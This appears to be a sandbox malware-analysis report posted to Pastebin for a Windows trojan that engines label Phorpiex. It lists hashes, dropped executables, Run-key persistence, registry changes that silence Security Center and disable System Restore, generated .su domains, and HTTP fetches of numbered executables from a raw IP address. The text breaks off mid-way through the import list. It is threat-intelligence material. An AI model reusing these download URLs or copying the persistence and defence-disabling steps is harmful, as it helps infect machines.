Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- [*] MalFamily: ""
- [*] MalScore: 10.0
- [*] File Name: "Exes_56c329b835490a887a6a941adfa6e4c2.exe"
- [*] File Size: 292352
- [*] File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
- [*] SHA256: "fa9020c32b1c1b810b6c261e77863411bc64e70aed6d2a3bbbb82ebdcbaf8740"
- [*] MD5: "56c329b835490a887a6a941adfa6e4c2"
- [*] SHA1: "fa831efbbe48deb179980e00042c91ae99d5bf20"
- [*] SHA512: "a29b5ae11a016b6d64bbd482416e476525f6e67d34e11485aa47a6e361a0b451492d4422647b0a79a9f69086c85faed987236ebafb9c80410a5c9efe7c7bcba9"
- [*] CRC32: "0DF89228"
- [*] SSDEEP: "6144:UvTr7niBcKnBGNYzF4BupEjMvFs4/2bR4d:637nOcKByKF4BAEQO4/O4d"
- [*] Process Execution: [
- "Exes_56c329b835490a887a6a941adfa6e4c2.exe",
- "winmonw.exe",
- "1017334714.exe",
- "3625111283.exe"
- ]
- [*] Signatures Detected: [
- {
- "Description": "Creates RWX memory",
- "Details": []
- },
- {
- "Description": "Repeatedly searches for a not-found process, may want to run with startbrowser=1 option",
- "Details": []
- },
- {
- "Description": "Drops a binary and executes it",
- "Details": [
- {
- "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\1017334714.exe"
- },
- {
- "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\3625111283.exe"
- },
- {
- "binary": "C:\\Windows\\3356173911556488\\winmonw.exe"
- }
- ]
- },
- {
- "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
- "Details": [
- {
- "ip_hostname": "HTTP connection was made to an IP address rather than domain name"
- },
- {
- "suspicious_request": "http://193.32.161.77/tldr.php?new=1"
- },
- {
- "suspicious_request": "http://193.32.161.77/tldr.php?on=1"
- },
- {
- "suspicious_request": "http://193.32.161.77/1.exe"
- },
- {
- "suspicious_request": "http://193.32.161.77/2.exe"
- },
- {
- "suspicious_request": "http://193.32.161.77/3.exe"
- },
- {
- "suspicious_request": "http://193.32.161.77/4.exe"
- },
- {
- "suspicious_request": "http://193.32.161.77/5.exe"
- },
- {
- "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D"
- },
- {
- "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D"
- },
- {
- "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D"
- }
- ]
- },
- {
- "Description": "Performs some HTTP requests",
- "Details": [
- {
- "url": "http://193.32.161.77/tldr.php?new=1"
- },
- {
- "url": "http://193.32.161.77/tldr.php?on=1"
- },
- {
- "url": "http://193.32.161.77/1.exe"
- },
- {
- "url": "http://193.32.161.77/2.exe"
- },
- {
- "url": "http://193.32.161.77/3.exe"
- },
- {
- "url": "http://193.32.161.77/4.exe"
- },
- {
- "url": "http://193.32.161.77/5.exe"
- },
- {
- "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D"
- },
- {
- "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D"
- },
- {
- "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D"
- }
- ]
- },
- {
- "Description": "Detects Sandboxie through the presence of a library",
- "Details": []
- },
- {
- "Description": "Detects SunBelt Sandbox through the presence of a library",
- "Details": []
- },
- {
- "Description": "Attempts to remove evidence of file being downloaded from the Internet",
- "Details": [
- {
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\1017334714.exe:Zone.Identifier"
- }
- ]
- },
- {
- "Description": "Installs itself for autorun at Windows startup",
- "Details": [
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Microsoft Windows Services"
- },
- {
- "data": "C:\\Windows\\3356173911556488\\winmonw.exe"
- },
- {
- "key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\Microsoft Windows Services"
- },
- {
- "data": "C:\\Windows\\3356173911556488\\winmonw.exe"
- }
- ]
- },
- {
- "Description": "Creates a hidden or system file",
- "Details": [
- {
- "file": "C:\\Windows\\3356173911556488"
- },
- {
- "file": "C:\\Windows\\3356173911556488\\winmonw.exe"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\winsvcs.txt"
- }
- ]
- },
- {
- "Description": "File has been identified by 38 Antiviruses on VirusTotal as malicious",
- "Details": [
- {
- "MicroWorld-eScan": "Trojan.GenericKD.41379811"
- },
- {
- "FireEye": "Generic.mg.56c329b835490a88"
- },
- {
- "McAfee": "Trojan-FQZA!56C329B83549"
- },
- {
- "AegisLab": "Trojan.Win32.Generic.mnLK"
- },
- {
- "K7AntiVirus": "Riskware ( 0040eff71 )"
- },
- {
- "Cybereason": "malicious.bbe48d"
- },
- {
- "Symantec": "ML.Attribute.HighConfidence"
- },
- {
- "ESET-NOD32": "a variant of Win32/Kryptik.GUBX"
- },
- {
- "APEX": "Malicious"
- },
- {
- "Paloalto": "generic.ml"
- },
- {
- "Kaspersky": "Trojan-Downloader.Win32.Trik.fx"
- },
- {
- "BitDefender": "Trojan.GenericKD.41379811"
- },
- {
- "Avast": "Win32:Trojan-gen"
- },
- {
- "Ad-Aware": "Trojan.Ransomware.GenericKDS.32066721"
- },
- {
- "Comodo": "TrojWare.Win32.Fakecsrss.AV@88nqyj"
- },
- {
- "F-Secure": "Trojan.TR/AD.Phorpiex.vkkfn"
- },
- {
- "Invincea": "heuristic"
- },
- {
- "McAfee-GW-Edition": "BehavesLike.Win32.Generic.dh"
- },
- {
- "Emsisoft": "Trojan.GenericKD.41379811 (B)"
- },
- {
- "Endgame": "malicious (high confidence)"
- },
- {
- "Avira": "TR/AD.Phorpiex.vkkfn"
- },
- {
- "Microsoft": "Trojan:Win32/Fuery.A!cl"
- },
- {
- "Arcabit": "Trojan.Ransomware.GenericS.D1E94CA1"
- },
- {
- "ViRobot": "Trojan.Win32.Z.Highconfidence.292352.B"
- },
- {
- "ZoneAlarm": "Trojan-Downloader.Win32.Trik.fx"
- },
- {
- "GData": "Win32.Worm.Phorpiex.402DNM"
- },
- {
- "AhnLab-V3": "Malware/Win32.Generic.C3291999"
- },
- {
- "Acronis": "suspicious"
- },
- {
- "VBA32": "BScope.Trojan.Sehyioa"
- },
- {
- "Cylance": "Unsafe"
- },
- {
- "Rising": "Trojan.Fuery!8.EAFB (CLOUD)"
- },
- {
- "SentinelOne": "DFI - Suspicious PE"
- },
- {
- "Fortinet": "W32/Kryptik.GUBX!tr"
- },
- {
- "MaxSecure": "Ransomeware.GandCrypt.Gen"
- },
- {
- "AVG": "Win32:Trojan-gen"
- },
- {
- "Panda": "Trj/Genetic.gen"
- },
- {
- "CrowdStrike": "win/malicious_confidence_70% (W)"
- },
- {
- "Qihoo-360": "HEUR/QVM10.2.F183.Malware.Gen"
- }
- ]
- },
- {
- "Description": "Operates on local firewall's policies and settings",
- "Details": []
- },
- {
- "Description": "Creates a copy of itself",
- "Details": [
- {
- "copy": "C:\\Windows\\3356173911556488\\winmonw.exe"
- },
- {
- "copy": "C:\\Users\\user\\AppData\\Local\\Temp\\1017334714.exe"
- }
- ]
- },
- {
- "Description": "Attempts to disable System Restore",
- "Details": []
- },
- {
- "Description": "Attempts to modify or disable Security Center warnings",
- "Details": []
- },
- {
- "Description": "Attempts to interact with an Alternate Data Stream (ADS)",
- "Details": [
- {
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\Exes_56c329b835490a887a6a941adfa6e4c2.exe:Zone.Iduentifier"
- },
- {
- "file": "C:\\Windows\\3356173911556488\\winmonw.exe:Zone.Iduentifier"
- }
- ]
- },
- {
- "Description": "Created network traffic indicative of malicious activity",
- "Details": [
- {
- "signature": "ET TROJAN Single char EXE direct download likely trojan (multiple families)"
- },
- {
- "signature": "ET DNS Query for .su TLD (Soviet Union) Often Malware Related"
- }
- ]
- }
- ]
- [*] Started Service: []
- [*] Executed Commands: [
- "C:\\Windows\\3356173911556488\\winmonw.exe",
- "C:\\Users\\user\\AppData\\Local\\Temp\\1017334714.exe",
- "C:\\Users\\user\\AppData\\Local\\Temp\\3625111283.exe"
- ]
- [*] Mutexes: [
- "4550003930"
- ]
- [*] Modified Files: [
- "C:\\Windows\\3356173911556488\\winmonw.exe",
- "C:\\Users\\user\\AppData\\Roaming\\winsvcs.txt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\1017334714.exe",
- "C:\\Users\\user\\AppData\\Local\\Temp\\3625111283.exe"
- ]
- [*] Deleted Files: [
- "C:\\Users\\user\\AppData\\Local\\Temp\\Exes_56c329b835490a887a6a941adfa6e4c2.exe:Zone.Iduentifier",
- "C:\\Windows\\3356173911556488\\winmonw.exe:Zone.Iduentifier",
- "C:\\Users\\user\\AppData\\Local\\Temp\\1017334714.exe:Zone.Identifier",
- "C:\\Users\\user\\AppData\\Local\\Temp\\3625111283.exe:Zone.Identifier"
- ]
- [*] Modified Registry Keys: [
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\Microsoft Windows Services",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Microsoft Windows Services",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Security Center\\AntiVirusOverride",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Security Center\\UpdatesOverride",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Security Center\\FirewallOverride",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Security Center\\AntiVirusDisableNotify",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Security Center\\UpdatesDisableNotify",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Security Center\\AutoUpdateDisableNotify",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Security Center\\FirewallDisableNotify",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore\\DisableSR"
- ]
- [*] Deleted Registry Keys: []
- [*] DNS Communications: [
- {
- "type": "A",
- "request": "aiheiufisd.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "aeoghehofu.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "aniaeninie.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "aiaeufaehe.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "aieieieros.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "abaeubuegs.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "aeubeufubg.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "aeuaueudgs.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "xiheiufisd.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "xeoghehofu.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "xniaeninie.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "xiaeufaehe.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "xieieieros.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "xbaeubuegs.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "teubeufubg.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "teuaueudgs.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "tiheiufisd.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "teoghehofu.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "tniaeninie.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "tiaeufaehe.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "tieieieros.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "tbaeubuegs.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "wiheiufisd.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "weoghehofu.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "wniaeninie.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "wiaeufaehe.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "wieieieros.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "wbaeubuegs.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "weubeufubg.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "weuaueudgs.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- }
- ]
- [*] Domains: [
- {
- "ip": "",
- "domain": "teubeufubg.su"
- },
- {
- "ip": "",
- "domain": "tbaeubuegs.su"
- },
- {
- "ip": "",
- "domain": "wniaeninie.su"
- },
- {
- "ip": "",
- "domain": "aiaeufaehe.su"
- },
- {
- "ip": "",
- "domain": "xiheiufisd.su"
- },
- {
- "ip": "",
- "domain": "teuaueudgs.su"
- },
- {
- "ip": "",
- "domain": "xbaeubuegs.su"
- },
- {
- "ip": "",
- "domain": "wiheiufisd.su"
- },
- {
- "ip": "",
- "domain": "xeoghehofu.su"
- },
- {
- "ip": "",
- "domain": "wbaeubuegs.su"
- },
- {
- "ip": "",
- "domain": "abaeubuegs.su"
- },
- {
- "ip": "",
- "domain": "tieieieros.su"
- },
- {
- "ip": "",
- "domain": "aeuaueudgs.su"
- },
- {
- "ip": "",
- "domain": "weubeufubg.su"
- },
- {
- "ip": "",
- "domain": "wiaeufaehe.su"
- },
- {
- "ip": "",
- "domain": "aeubeufubg.su"
- },
- {
- "ip": "",
- "domain": "aeoghehofu.su"
- },
- {
- "ip": "",
- "domain": "weoghehofu.su"
- },
- {
- "ip": "",
- "domain": "aniaeninie.su"
- },
- {
- "ip": "",
- "domain": "xieieieros.su"
- },
- {
- "ip": "",
- "domain": "wieieieros.su"
- },
- {
- "ip": "",
- "domain": "tiaeufaehe.su"
- },
- {
- "ip": "",
- "domain": "aiheiufisd.su"
- },
- {
- "ip": "",
- "domain": "xiaeufaehe.su"
- },
- {
- "ip": "",
- "domain": "tniaeninie.su"
- },
- {
- "ip": "",
- "domain": "xniaeninie.su"
- },
- {
- "ip": "",
- "domain": "weuaueudgs.su"
- },
- {
- "ip": "",
- "domain": "teoghehofu.su"
- },
- {
- "ip": "",
- "domain": "aieieieros.su"
- },
- {
- "ip": "",
- "domain": "tiheiufisd.su"
- }
- ]
- [*] Network Communication - ICMP: []
- [*] Network Communication - HTTP: [
- {
- "count": 1,
- "body": "",
- "uri": "http://193.32.161.77/tldr.php?new=1",
- "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0",
- "method": "GET",
- "host": "193.32.161.77",
- "version": "1.1",
- "path": "/tldr.php?new=1",
- "data": "GET /tldr.php?new=1 HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0\r\nHost: 193.32.161.77\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://193.32.161.77/tldr.php?on=1",
- "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0",
- "method": "GET",
- "host": "193.32.161.77",
- "version": "1.1",
- "path": "/tldr.php?on=1",
- "data": "GET /tldr.php?on=1 HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0\r\nHost: 193.32.161.77\r\n\r\n",
- "port": 80
- },
- {
- "count": 2,
- "body": "",
- "uri": "http://193.32.161.77/1.exe",
- "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0",
- "method": "GET",
- "host": "193.32.161.77",
- "version": "1.1",
- "path": "/1.exe",
- "data": "GET /1.exe HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0\r\nHost: 193.32.161.77\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://193.32.161.77/2.exe",
- "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0",
- "method": "GET",
- "host": "193.32.161.77",
- "version": "1.1",
- "path": "/2.exe",
- "data": "GET /2.exe HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0\r\nHost: 193.32.161.77\r\n\r\n",
- "port": 80
- },
- {
- "count": 2,
- "body": "",
- "uri": "http://193.32.161.77/3.exe",
- "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0",
- "method": "GET",
- "host": "193.32.161.77",
- "version": "1.1",
- "path": "/3.exe",
- "data": "GET /3.exe HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0\r\nHost: 193.32.161.77\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://193.32.161.77/4.exe",
- "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0",
- "method": "GET",
- "host": "193.32.161.77",
- "version": "1.1",
- "path": "/4.exe",
- "data": "GET /4.exe HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0\r\nHost: 193.32.161.77\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://193.32.161.77/5.exe",
- "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0",
- "method": "GET",
- "host": "193.32.161.77",
- "version": "1.1",
- "path": "/5.exe",
- "data": "GET /5.exe HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0\r\nHost: 193.32.161.77\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "ocsp.digicert.com",
- "version": "1.1",
- "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D",
- "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D HTTP/1.1\r\nCache-Control: max-age = 150849\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Tue, 28 May 2019 10:50:30 GMT\r\nIf-None-Match: \"5ced1276-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "ocsp.digicert.com",
- "version": "1.1",
- "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D",
- "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D HTTP/1.1\r\nCache-Control: max-age = 135176\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Tue, 28 May 2019 05:30:18 GMT\r\nIf-None-Match: \"5cecc76a-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "ocsp.digicert.com",
- "version": "1.1",
- "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D",
- "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D HTTP/1.1\r\nCache-Control: max-age = 168744\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Tue, 28 May 2019 15:00:08 GMT\r\nIf-None-Match: \"5ced4cf8-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
- "port": 80
- }
- ]
- [*] Network Communication - SMTP: []
- [*] Network Communication - Hosts: []
- [*] Network Communication - IRC: []
- [*] Static Analysis: {
- "pe": {
- "peid_signatures": null,
- "imports": [
- {
- "imports": [
- {
- "name": "FillConsoleOutputCharacterA",
- "address": "0x42b000"
- },
- {
- "name": "HeapReAlloc",
- "address": "0x42b004"
- },
- {
- "name": "GetNativeSystemInfo",
- "address": "0x42b008"
- },
- {
- "name": "SetLocaleInfoA",
- "address": "0x42b00c"
- },
- {
- "name": "WritePrivateProfileStructA",
- "address": "0x42b010"
- },
- {
- "name": "GetDefaultCommConfigW",
- "address": "0x42b014"
- },
- {
- "name": "FindResourceW",
- "address": "0x42b018"
- },
- {
- "name": "WaitNamedPipeA",
- "address": "0x42b01c"
- },
- {
- "name": "WaitForSingleObject",
- "address": "0x42b020"
- },
- {
- "name": "SetTapeParameters",
- "address": "0x42b024"
- },
- {
- "name": "GetModuleHandleW",
- "address": "0x42b028"
- },
- {
- "name": "GetTickCount",
- "address": "0x42b02c"
- },
- {
- "name": "ExpandEnvironmentStringsA",
- "address": "0x42b030"
- },
- {
- "name": "ReadConsoleW",
- "address": "0x42b034"
- },
- {
- "name": "FormatMessageA",
- "address": "0x42b038"
- },
- {
- "name": "EnumTimeFormatsA",
- "address": "0x42b03c"
- },
- {
- "name": "EnumTimeFormatsW",
- "address": "0x42b040"
- },
- {
- "name": "GlobalAlloc",
- "address": "0x42b044"
- },
- {
- "name": "GetFirmwareEnvironmentVariableA",
- "address": "0x42b048"
- },
- {
- "name": "GetStringTypeExW",
- "address": "0x42b04c"
- },
- {
- "name": "IsProcessorFeaturePresent",
- "address": "0x42b050"
- },
- {
- "name": "GetVolumePathNamesForVolumeNameW",
- "address": "0x42b054"
- },
- {
- "name": "ReplaceFileW",
- "address": "0x42b058"
- },
- {
- "name": "GetSystemDirectoryA",
- "address": "0x42b05c"
- },
- {
- "name": "CreateMailslotW",
- "address": "0x42b060"
- },
- {
- "name": "WritePrivateProfileStringW",
- "address": "0x42b064"
- },
- {
- "name": "EnumSystemLocalesA",
- "address": "0x42b068"
- },
- {
- "name": "VerifyVersionInfoW",
- "address": "0x42b06c"
- },
- {
- "name": "GetProfileIntA",
- "address": "0x42b070"
- },
- {
- "name": "Module32First",
- "address": "0x42b074"
- },
- {
- "name": "GetProcAddress",
- "address": "0x42b078"
- },
- {
- "name": "GetLongPathNameA",
- "address": "0x42b07c"
- },
- {
- "name": "DefineDosDeviceW",
- "address": "0x42b080"
- },
- {
- "name": "HeapUnlock",
- "address": "0x42b084"
- },
- {
- "name": "MoveFileW",
- "address": "0x42b088"
- },
- {
- "name": "GetAtomNameA",
- "address": "0x42b08c"
- },
- {
- "name": "LocalAlloc",
- "address": "0x42b090"
- },
- {
- "name": "FindFirstVolumeMountPointW",
- "address": "0x42b094"
- },
- {
- "name": "OpenEventA",
- "address": "0x42b098"
- },
- {
- "name": "GetProfileStringA",
- "address": "0x42b09c"
- },
- {
- "name": "OpenJobObjectW",
- "address": "0x42b0a0"
- },
- {
- "name": "GetThreadPriority",
- "address": "0x42b0a4"
- },
- {
- "name": "FindFirstChangeNotificationA",
- "address": "0x42b0a8"
- },
- {
- "name": "WriteProfileStringW",
- "address": "0x42b0ac"
- },
- {
- "name": "MoveFileWithProgressW",
- "address": "0x42b0b0"
- },
- {
- "name": "GetConsoleProcessList",
- "address": "0x42b0b4"
- },
- {
- "name": "ExpandEnvironmentStringsW",
- "address": "0x42b0b8"
- },
- {
- "name": "CreateFileW",
- "address": "0x42b0bc"
- },
- {
- "name": "FlushFileBuffers",
- "address": "0x42b0c0"
- },
- {
- "name": "GetStringTypeW",
- "address": "0x42b0c4"
- },
- {
- "name": "WriteConsoleW",
- "address": "0x42b0c8"
- },
- {
- "name": "SetStdHandle",
- "address": "0x42b0cc"
- },
- {
- "name": "OutputDebugStringW",
- "address": "0x42b0d0"
- },
- {
- "name": "EnumSystemLocalesW",
- "address": "0x42b0d4"
- },
- {
- "name": "EncodePointer",
- "address": "0x42b0d8"
- },
- {
- "name": "DecodePointer",
- "address": "0x42b0dc"
- },
- {
- "name": "GetCommandLineA",
- "address": "0x42b0e0"
- },
- {
- "name": "RaiseException",
- "address": "0x42b0e4"
- },
- {
- "name": "RtlUnwind",
- "address": "0x42b0e8"
- },
- {
- "name": "IsDebuggerPresent",
- "address": "0x42b0ec"
- },
- {
- "name": "GetLastError",
- "address": "0x42b0f0"
- },
- {
- "name": "ExitProcess",
- "address": "0x42b0f4"
- },
- {
- "name": "GetModuleHandleExW",
- "address": "0x42b0f8"
- },
- {
